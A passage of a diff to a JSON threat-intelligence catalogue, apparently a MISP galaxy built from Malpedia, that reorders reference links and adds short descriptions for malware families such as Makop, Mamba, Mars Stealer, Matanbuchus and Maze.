"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf" ], "synonyms": [ "Koko Ransomware", @@ -32407,11 +33941,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o", - "https://blog.group-ib.com/task", "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", "https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf", "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op", - "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/" + "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/", + "https://blog.group-ib.com/task" ], "synonyms": [], "type": [] @@ -32438,10 +33972,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", - "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs", - "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html" + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], "type": [] @@ -32463,14 +33997,31 @@ "value": "MakLoader" }, { - "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop", + "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware", + "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11", + "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://twitter.com/siri_urz/status/1221797493849018368" + ], + "synonyms": [], + "type": [] + }, + "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", + "value": "Makop" + }, + { + "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", + "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11", "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://twitter.com/siri_urz/status/1221797493849018368", - "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11" + "https://twitter.com/siri_urz/status/1221797493849018368" ], "synonyms": [], "type": [] @@ -32479,13 +34030,13 @@ "value": "Makop Ransomware" }, { - "description": "", + "description": "According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", + "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", - "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", - "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" + "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" ], "synonyms": [], "type": [] @@ -32507,14 +34058,14 @@ "value": "MalumPOS" }, { - "description": "", + "description": "According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the \".mamba\" extension plus the victim's unique ID and developer's email address.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", + "https://securelist.com/the-return-of-mamba-ransomware/79403/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", "https://www.ic3.gov/Media/News/2021/210323.pdf", - "https://securelist.com/the-return-of-mamba-ransomware/79403/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" ], "synonyms": [ "DiskCryptor", @@ -32546,9 +34097,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf", "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2", - "https://www.youtube.com/watch?v=NFJqD-LcpIg" + "https://www.youtube.com/watch?v=NFJqD-LcpIg", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf" ], "synonyms": [ "junidor", @@ -32605,6 +34156,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa", + "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/", + "https://www.sangfor.com/blog/cybersecurity/alert-new-globeimposter-olympian-gods-20-coming", "https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html" ], "synonyms": [], @@ -32632,8 +34185,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], "type": [] @@ -32647,8 +34200,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa", "https://www.us-cert.gov/ics/advisories/ICSA-10-090-01", - "https://defintel.com/docs/Mariposa_Analysis.pdf", - "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/" + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", + "https://defintel.com/docs/Mariposa_Analysis.pdf" ], "synonyms": [ "Autorun", @@ -32693,26 +34246,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer", - "https://isc.sans.edu/diary/rss/28468", - "https://cyberint.com/blog/research/mars-stealer/", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", + "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", + "https://blog.morphisec.com/threat-research-mars-stealer", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://3xp0rt.com/posts/mars-stealer", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://cyberint.com/blog/research/mars-stealer/", + "https://isc.sans.edu/diary/rss/28468", + "https://blog.sekoia.io/mars-a-red-hot-information-stealer/", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer", + "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://cert.gov.ua/article/38606", "https://x-junior.github.io/malware%20analysis/MarsStealer/", - "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer", - "https://3xp0rt.com/posts/mars-stealer", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", - "https://blog.morphisec.com/threat-research-mars-stealer", - "https://blog.sekoia.io/mars-a-red-hot-information-stealer/", - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", - "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", "https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", "https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/", - "https://threatmon.io/mars-stealer-malware-analysis-threatmon/" + "https://threatmon.io/mars-stealer-malware-analysis-threatmon/", + "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/" ], "synonyms": [], "type": [] @@ -32738,16 +34291,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger", - "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", - "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", - "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", - "https://twitter.com/pancak3lullz/status/1255893734241304576", - "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/" + "https://twitter.com/pancak3lullz/status/1255893734241304576", + "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", + "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", + "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", + "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html" ], "synonyms": [], "type": [] @@ -32756,18 +34309,18 @@ "value": "MASS Logger" }, { - "description": "", + "description": "According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.\r\n\r\nSince it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus", - "https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a", - "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/", - "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html", - "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", + "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/", "https://isc.sans.edu/diary/rss/28752", - "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/" + "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/", + "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/", + "https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a", + "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html" ], "synonyms": [], "type": [] @@ -32802,16 +34355,16 @@ "value": "Matrix Banker" }, { - "description": "", + "description": "Matrix is a ransomware that encrypts a victim's files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim's data.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf", - "https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/", - "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware", "https://unit42.paloaltonetworks.com/matrix-ransomware/", + "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware", + "https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf" + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf" ], "synonyms": [], "type": [] @@ -32824,8 +34377,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", - "http://www.clearskysec.com/tulip/", - "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", + "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] @@ -32851,8 +34404,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi", - "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html" ], "synonyms": [], "type": [] @@ -32865,11 +34418,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui", + "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "https://www.cisa.gov/uscert/ncas/alerts/aa22-187a", "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", - "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-187a-north-korean%20state-sponsored-cyber-actors-use-maui-ransomware-to-target-the-hph-sector.pdf", - "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/" + "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf" ], "synonyms": [], "type": [] @@ -32895,117 +34448,117 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://securelist.com/maze-ransomware/99137/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", - "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", - "https://twitter.com/certbund/status/1192756294307995655", - "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://adversary.crowdstrike.com/adversary/twisted-spider/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", - "https://www.secureworks.com/research/threat-profiles/gold-village", - "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/", - "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", - "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "http://www.secureworks.com/research/threat-profiles/gold-village", - "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.docdroid.net/dUpPY5s/maze.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", - "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", - "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", - "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", - "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", - "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", - "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://twitter.com/certbund/status/1192756294307995655", + "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", + "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + 